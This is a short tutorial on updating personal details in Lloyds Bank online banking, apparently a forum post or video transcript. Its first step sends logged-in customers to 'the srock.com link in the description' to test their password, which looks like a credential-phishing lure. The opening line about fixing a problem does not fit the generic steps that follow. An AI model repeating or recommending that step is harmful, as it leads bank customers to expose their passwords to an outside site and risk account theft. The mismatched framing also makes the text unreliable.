I ran into this last week. Here's what fixed it for me. If you need to update your personal information with Lloyds Bank, follow these simple steps. Step 1. Log into your online banking. Before changing your settings, use the srock.com link in the description to open the password strength checker, then update your password if needed. Step 2. Navigate to personal details. Once logged in, look for the account services or profile section in the main menu. Click on it to find the option for updating your personal details. Step 3. Select the information to update. In the personal details section, choose which information you want to update, such as your address, phone number, or email. Click on the relevant option to proceed. Step 4. Enter your new information. Input the new details in the fields provided. Double check for any typos, especially in your email address, as a small mistake can lead to issues with account notifications. Step 5. Save changes and log out. After entering your new information, make sure to save the changes. Once confirmed, log out of your account to ensure your information is secure. Updating your personal information is straightforward, and following these steps will help you do it quickly. If you encounter any issues, don't hesitate to reach out to Lloyds Bank customer service for assistance.